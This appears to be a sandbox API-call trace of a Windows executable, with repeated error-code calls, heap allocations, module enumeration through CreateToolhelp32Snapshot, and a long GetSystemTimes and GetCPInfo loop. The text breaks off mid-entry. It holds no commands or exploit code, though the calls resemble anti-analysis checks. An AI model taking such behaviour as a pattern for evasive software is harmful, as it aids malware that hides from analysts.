SetLastError (dwErrCode=0x0) [0077.237] GetLastError () returned 0x0 [0077.237] SetLastError (dwErrCode=0x0) [0077.237] GetLastError () returned 0x0 [0077.238] SetLastError (dwErrCode=0x0) [0077.238] GetLastError () returned 0x0 [0077.238] SetLastError (dwErrCode=0x0) [0077.238] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x0, Size=0x68) returned 0x1f81990 [0077.238] GetLastError () returned 0x0 [0077.238] SetLastError (dwErrCode=0x0) [0077.238] GetLastError () returned 0x0 [0077.238] SetLastError (dwErrCode=0x0) [0077.238] GetLastError () returned 0x0 [0077.238] SetLastError (dwErrCode=0x0) [0077.238] GetLastError () returned 0x0 [0077.238] SetLastError (dwErrCode=0x0) [0077.238] GetLastError () returned 0x0 [0077.239] SetLastError (dwErrCode=0x0) [0077.239] GetLastError () returned 0x0 [0077.239] SetLastError (dwErrCode=0x0) [0077.239] GetLastError () returned 0x0 [0077.239] SetLastError (dwErrCode=0x0) [0077.239] GetLastError () returned 0x0 [0077.239] SetLastError (dwErrCode=0x0) [0077.239] GetLastError () returned 0x0 [0077.239] SetLastError (dwErrCode=0x0) [0077.239] GetLastError () returned 0x0 [0077.239] SetLastError (dwErrCode=0x0) [0077.239] GetLastError () returned 0x0 [0077.240] SetLastError (dwErrCode=0x0) [0077.240] GetLastError () returned 0x0 [0077.240] SetLastError (dwErrCode=0x0) [0077.240] GetLastError () returned 0x0 [0077.240] SetLastError (dwErrCode=0x0) [0077.240] GetLastError () returned 0x0 [0077.240] SetLastError (dwErrCode=0x0) [0077.240] GetLastError () returned 0x0 [0077.240] SetLastError (dwErrCode=0x0) [0077.240] GetLastError () returned 0x0 [0077.240] SetLastError (dwErrCode=0x0) [0077.240] GetLastError () returned 0x0 [0077.241] SetLastError (dwErrCode=0x0) [0077.241] GetLastError () returned 0x0 [0077.241] SetLastError (dwErrCode=0x0) [0077.241] GetLastError () returned 0x0 [0077.241] SetLastError (dwErrCode=0x0) [0077.241] GetLastError () returned 0x0 [0077.241] SetLastError (dwErrCode=0x0) [0077.241] GetLastError () returned 0x0 [0077.241] SetLastError (dwErrCode=0x0) [0077.241] GetLastError () returned 0x0 [0077.241] SetLastError (dwErrCode=0x0) [0077.241] GetLastError () returned 0x0 [0077.242] SetLastError (dwErrCode=0x0) [0077.242] GetLastError () returned 0x0 [0077.242] SetLastError (dwErrCode=0x0) [0077.242] GetLastError () returned 0x0 [0077.242] SetLastError (dwErrCode=0x0) [0077.242] GetLastError () returned 0x0 [0077.242] SetLastError (dwErrCode=0x0) [0077.242] GetLastError () returned 0x0 [0077.242] SetLastError (dwErrCode=0x0) [0077.242] GetLastError () returned 0x0 [0077.242] SetLastError (dwErrCode=0x0) [0077.242] GetLastError () returned 0x0 [0077.243] SetLastError (dwErrCode=0x0) [0077.243] GetLastError () returned 0x0 [0077.243] SetLastError (dwErrCode=0x0) [0077.243] GetLastError () returned 0x0 [0077.243] SetLastError (dwErrCode=0x0) [0077.243] GetLastError () returned 0x0 [0077.243] SetLastError (dwErrCode=0x0) [0077.243] GetLastError () returned 0x0 [0077.243] SetLastError (dwErrCode=0x0) [0077.243] GetLastError () returned 0x0 [0077.243] SetLastError (dwErrCode=0x0) [0077.243] GetLastError () returned 0x0 [0077.244] SetLastError (dwErrCode=0x0) [0077.244] GetLastError () returned 0x0 [0077.244] SetLastError (dwErrCode=0x0) [0077.244] GetLastError () returned 0x0 [0077.244] SetLastError (dwErrCode=0x0) [0077.244] GetLastError () returned 0x0 [0077.244] SetLastError (dwErrCode=0x0) [0077.244] GetLastError () returned 0x0 [0077.244] SetLastError (dwErrCode=0x0) [0077.244] GetLastError () returned 0x0 [0077.245] SetLastError (dwErrCode=0x0) [0077.245] GetLastError () returned 0x0 [0077.245] SetLastError (dwErrCode=0x0) [0077.245] GetLastError () returned 0x0 [0077.245] SetLastError (dwErrCode=0x0) [0077.245] GetLastError () returned 0x0 [0077.245] SetLastError (dwErrCode=0x0) [0077.245] GetLastError () returned 0x0 [0077.245] SetLastError (dwErrCode=0x0) [0077.245] GetLastError () returned 0x0 [0077.246] SetLastError (dwErrCode=0x0) [0077.246] GetLastError () returned 0x0 [0077.246] SetLastError (dwErrCode=0x0) [0077.246] GetLastError () returned 0x0 [0077.246] SetLastError (dwErrCode=0x0) [0077.246] GetLastError () returned 0x0 [0077.246] SetLastError (dwErrCode=0x0) [0077.246] GetLastError () returned 0x0 [0077.246] SetLastError (dwErrCode=0x0) [0077.246] GetLastError () returned 0x0 [0077.247] SetLastError (dwErrCode=0x0) [0077.247] GetLastError () returned 0x0 [0077.247] SetLastError (dwErrCode=0x0) [0077.247] GetLastError () returned 0x0 [0077.247] SetLastError (dwErrCode=0x0) [0077.247] GetLastError () returned 0x0 [0077.247] SetLastError (dwErrCode=0x0) [0077.247] GetLastError () returned 0x0 [0077.247] SetLastError (dwErrCode=0x0) [0077.247] GetLastError () returned 0x0 [0077.248] SetLastError (dwErrCode=0x0) [0077.248] GetLastError () returned 0x0 [0077.248] SetLastError (dwErrCode=0x0) [0077.248] GetLastError () returned 0x0 [0077.248] SetLastError (dwErrCode=0x0) [0077.248] GetLastError () returned 0x0 [0077.248] SetLastError (dwErrCode=0x0) [0077.248] GetLastError () returned 0x0 [0077.248] SetLastError (dwErrCode=0x0) [0077.248] GetLastError () returned 0x0 [0077.248] SetLastError (dwErrCode=0x0) [0077.248] GetLastError () returned 0x0 [0077.249] SetLastError (dwErrCode=0x0) [0077.249] GetLastError () returned 0x0 [0077.249] SetLastError (dwErrCode=0x0) [0077.249] GetLastError () returned 0x0 [0077.249] SetLastError (dwErrCode=0x0) [0077.249] GetLastError () returned 0x0 [0077.249] SetLastError (dwErrCode=0x0) [0077.249] GetLastError () returned 0x0 [0077.249] SetLastError (dwErrCode=0x0) [0077.249] GetLastError () returned 0x0 [0077.249] SetLastError (dwErrCode=0x0) [0077.249] GetLastError () returned 0x0 [0077.249] SetLastError (dwErrCode=0x0) [0077.249] GetLastError () returned 0x0 [0077.249] SetLastError (dwErrCode=0x0) [0077.250] GetLastError () returned 0x0 [0077.250] SetLastError (dwErrCode=0x0) [0077.250] GetLastError () returned 0x0 [0077.250] SetLastError (dwErrCode=0x0) [0077.250] GetLastError () returned 0x0 [0077.250] SetLastError (dwErrCode=0x0) [0077.250] GetLastError () returned 0x0 [0077.250] SetLastError (dwErrCode=0x0) [0077.250] GetLastError () returned 0x0 [0077.250] SetLastError (dwErrCode=0x0) [0077.250] GetLastError () returned 0x0 [0077.250] SetLastError (dwErrCode=0x0) [0077.250] GetLastError () returned 0x0 [0077.251] SetLastError (dwErrCode=0x0) [0077.251] GetLastError () returned 0x0 [0077.251] SetLastError (dwErrCode=0x0) [0077.251] GetLastError () returned 0x0 [0077.251] SetLastError (dwErrCode=0x0) [0077.251] GetLastError () returned 0x0 [0077.251] SetLastError (dwErrCode=0x0) [0077.251] GetLastError () returned 0x0 [0077.251] SetLastError (dwErrCode=0x0) [0077.251] GetLastError () returned 0x0 [0077.251] SetLastError (dwErrCode=0x0) [0077.251] GetLastError () returned 0x0 [0077.251] SetLastError (dwErrCode=0x0) [0077.252] GetLastError () returned 0x0 [0077.252] SetLastError (dwErrCode=0x0) [0077.252] GetLastError () returned 0x0 [0077.252] SetLastError (dwErrCode=0x0) [0077.252] GetLastError () returned 0x0 [0077.252] SetLastError (dwErrCode=0x0) [0077.252] GetLastError () returned 0x0 [0077.252] SetLastError (dwErrCode=0x0) [0077.252] GetLastError () returned 0x0 [0077.252] SetLastError (dwErrCode=0x0) [0077.252] GetLastError () returned 0x0 [0077.252] SetLastError (dwErrCode=0x0) [0077.252] GetLastError () returned 0x0 [0077.252] SetLastError (dwErrCode=0x0) [0077.252] GetLastError () returned 0x0 [0077.252] SetLastError (dwErrCode=0x0) [0077.252] GetLastError () returned 0x0 [0077.253] SetLastError (dwErrCode=0x0) [0077.253] GetLastError () returned 0x0 [0077.253] SetLastError (dwErrCode=0x0) [0077.253] GetLastError () returned 0x0 [0077.253] SetLastError (dwErrCode=0x0) [0077.253] GetLastError () returned 0x0 [0077.253] SetLastError (dwErrCode=0x0) [0077.253] GetLastError () returned 0x0 [0077.253] SetLastError (dwErrCode=0x0) [0077.253] GetLastError () returned 0x0 [0077.253] SetLastError (dwErrCode=0x0) [0077.253] GetLastError () returned 0x0 [0077.253] SetLastError (dwErrCode=0x0) [0077.254] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x98) returned 0x1f81a00 [0077.254] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x1f) returned 0x1f81aa0 [0077.254] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x36) returned 0x1f81ac8 [0077.254] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x37) returned 0x1f81b08 [0077.254] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x3c) returned 0x1f81b48 [0077.254] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x31) returned 0x1f81b90 [0077.254] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x17) returned 0x1f81bd0 [0077.254] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x24) returned 0x1f81bf0 [0077.254] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x14) returned 0x1f81c20 [0077.254] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0xd) returned 0x1f81c40 [0077.254] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x25) returned 0x1f81c58 [0077.254] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x39) returned 0x1f81c88 [0077.254] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x18) returned 0x1f81cd0 [0077.254] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x17) returned 0x1f81cf0 [0077.254] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0xe) returned 0x1f81d10 [0077.254] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x69) returned 0x1f81d28 [0077.254] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x3e) returned 0x1f81da0 [0077.254] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x1b) returned 0x1f81de8 [0077.254] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x1d) returned 0x1f81e10 [0077.254] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x48) returned 0x1f81e38 [0077.254] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x12) returned 0x1f81e88 [0077.254] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x18) returned 0x1f81ea8 [0077.254] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x1b) returned 0x1f81ec8 [0077.254] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x24) returned 0x1f81ef0 [0077.254] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x29) returned 0x1f81f20 [0077.254] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x1e) returned 0x1f81f58 [0077.254] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x41) returned 0x1f81f80 [0077.254] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x17) returned 0x1f81fd0 [0077.255] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0xf) returned 0x1f81ff0 [0077.255] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x16) returned 0x1f82008 [0077.255] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x2a) returned 0x1f82028 [0077.255] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x29) returned 0x1f82060 [0077.255] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x15) returned 0x1f82098 [0077.255] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x1e) returned 0x1f820b8 [0077.255] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x2a) returned 0x1f820e0 [0077.255] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x12) returned 0x1f82118 [0077.255] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x18) returned 0x1f82138 [0077.255] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x46) returned 0x1f82158 [0077.255] HeapFree (in: hHeap=0x1f80000, dwFlags=0x0, lpMem=0x1f811f8 | out: hHeap=0x1f80000) returned 1 [0077.345] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x800) returned 0x1f821a8 [0077.345] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x80) returned 0x1f811f8 [0077.345] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404e49) returned 0x0 [0077.346] RtlSizeHeap (HeapHandle=0x1f80000, Flags=0x0, MemoryPointer=0x1f811f8) returned 0x80 [0077.347] GetLastError () returned 0x0 [0077.347] SetLastError (dwErrCode=0x0) [0077.347] GetLastError () returned 0x0 [0077.347] SetLastError (dwErrCode=0x0) [0077.347] GetLastError () returned 0x0 [0077.347] SetLastError (dwErrCode=0x0) [0077.347] GetLastError () returned 0x0 [0077.347] SetLastError (dwErrCode=0x0) [0077.347] GetLastError () returned 0x0 [0077.348] SetLastError (dwErrCode=0x0) [0077.348] GetLastError () returned 0x0 [0077.348] SetLastError (dwErrCode=0x0) [0077.348] GetLastError () returned 0x0 [0077.348] SetLastError (dwErrCode=0x0) [0077.348] GetLastError () returned 0x0 [0077.348] SetLastError (dwErrCode=0x0) [0077.348] GetLastError () returned 0x0 [0077.348] SetLastError (dwErrCode=0x0) [0077.348] GetLastError () returned 0x0 [0077.348] SetLastError (dwErrCode=0x0) [0077.348] GetLastError () returned 0x0 [0077.349] SetLastError (dwErrCode=0x0) [0077.349] GetLastError () returned 0x0 [0077.349] SetLastError (dwErrCode=0x0) [0077.349] GetLastError () returned 0x0 [0077.349] SetLastError (dwErrCode=0x0) [0077.349] GetLastError () returned 0x0 [0077.350] SetLastError (dwErrCode=0x0) [0077.350] GetLastError () returned 0x0 [0077.350] SetLastError (dwErrCode=0x0) [0077.350] GetLastError () returned 0x0 [0077.350] SetLastError (dwErrCode=0x0) [0077.350] GetLastError () returned 0x0 [0077.350] SetLastError (dwErrCode=0x0) [0077.350] GetLastError () returned 0x0 [0077.350] SetLastError (dwErrCode=0x0) [0077.350] GetLastError () returned 0x0 [0077.351] SetLastError (dwErrCode=0x0) [0077.351] GetLastError () returned 0x0 [0077.351] SetLastError (dwErrCode=0x0) [0077.351] GetLastError () returned 0x0 [0077.351] SetLastError (dwErrCode=0x0) [0077.351] GetLastError () returned 0x0 [0077.351] SetLastError (dwErrCode=0x0) [0077.351] GetLastError () returned 0x0 [0077.352] SetLastError (dwErrCode=0x0) [0077.352] GetLastError () returned 0x0 [0077.352] SetLastError (dwErrCode=0x0) [0077.352] GetLastError () returned 0x0 [0077.352] SetLastError (dwErrCode=0x0) [0077.352] GetLastError () returned 0x0 [0077.352] SetLastError (dwErrCode=0x0) [0077.352] GetLastError () returned 0x0 [0077.352] SetLastError (dwErrCode=0x0) [0077.353] GetLastError () returned 0x0 [0077.353] SetLastError (dwErrCode=0x0) [0077.353] GetLastError () returned 0x0 [0077.353] SetLastError (dwErrCode=0x0) [0077.353] GetLastError () returned 0x0 [0077.353] SetLastError (dwErrCode=0x0) [0077.353] GetLastError () returned 0x0 [0077.353] SetLastError (dwErrCode=0x0) [0077.353] GetLastError () returned 0x0 [0077.354] SetLastError (dwErrCode=0x0) [0077.354] GetLastError () returned 0x0 [0077.354] SetLastError (dwErrCode=0x0) [0077.354] GetLastError () returned 0x0 [0077.354] SetLastError (dwErrCode=0x0) [0077.354] GetLastError () returned 0x0 [0077.354] SetLastError (dwErrCode=0x0) [0077.354] GetLastError () returned 0x0 [0077.354] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76e10000 [0077.354] GetProcAddress (hModule=0x76e10000, lpProcName="CreateToolhelp32Snapshot") returned 0x76e4735f [0077.355] GetProcAddress (hModule=0x76e10000, lpProcName="Module32FirstW") returned 0x76e479f9 [0077.355] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x78 [0077.358] Module32FirstW (hSnapshot=0x78, lpme=0x18fac8) returned 0 [0077.359] PeekMessageA (in: lpMsg=0x18fa44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x18fa44) returned 0 [0077.359] GetTickCount () returned 0x1159944 [0077.359] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.359] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.359] GetACP () returned 0x4e4 [0077.359] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.359] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.359] GetACP () returned 0x4e4 [0077.359] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.359] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.359] GetACP () returned 0x4e4 [0077.359] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.360] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.360] GetACP () returned 0x4e4 [0077.360] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.360] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.360] GetACP () returned 0x4e4 [0077.360] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.360] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.360] GetACP () returned 0x4e4 [0077.360] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.361] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.361] GetACP () returned 0x4e4 [0077.361] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.361] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.361] GetACP () returned 0x4e4 [0077.361] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.361] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.361] GetACP () returned 0x4e4 [0077.361] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.361] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.361] GetACP () returned 0x4e4 [0077.361] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.361] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.361] GetACP () returned 0x4e4 [0077.361] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.362] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.362] GetACP () returned 0x4e4 [0077.362] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.362] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.362] GetACP () returned 0x4e4 [0077.362] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.362] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.362] GetACP () returned 0x4e4 [0077.362] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.362] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.362] GetACP () returned 0x4e4 [0077.362] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.362] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.362] GetACP () returned 0x4e4 [0077.362] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.363] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.363] GetACP () returned 0x4e4 [0077.363] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.363] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.363] GetACP () returned 0x4e4 [0077.363] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.363] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.363] GetACP () returned 0x4e4 [0077.363] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.363] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.363] GetACP () returned 0x4e4 [0077.364] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.364] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.364] GetACP () returned 0x4e4 [0077.364] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.364] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.364] GetACP () returned 0x4e4 [0077.364] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.364] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.364] GetACP () returned 0x4e4 [0077.364] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.365] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.365] GetACP () returned 0x4e4 [0077.365] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.365] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.365] GetACP () returned 0x4e4 [0077.365] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.365] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.365] GetACP () returned 0x4e4 [0077.365] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.365] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.366] GetACP () returned 0x4e4 [0077.366] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.366] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.366] GetACP () returned 0x4e4 [0077.366] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.366] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.366] GetACP () returned 0x4e4 [0077.366] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.366] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.366] GetACP () returned 0x4e4 [0077.366] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.366] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.367] GetACP () returned 0x4e4 [0077.367] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.367] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.367] GetACP () returned 0x4e4 [0077.367] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: 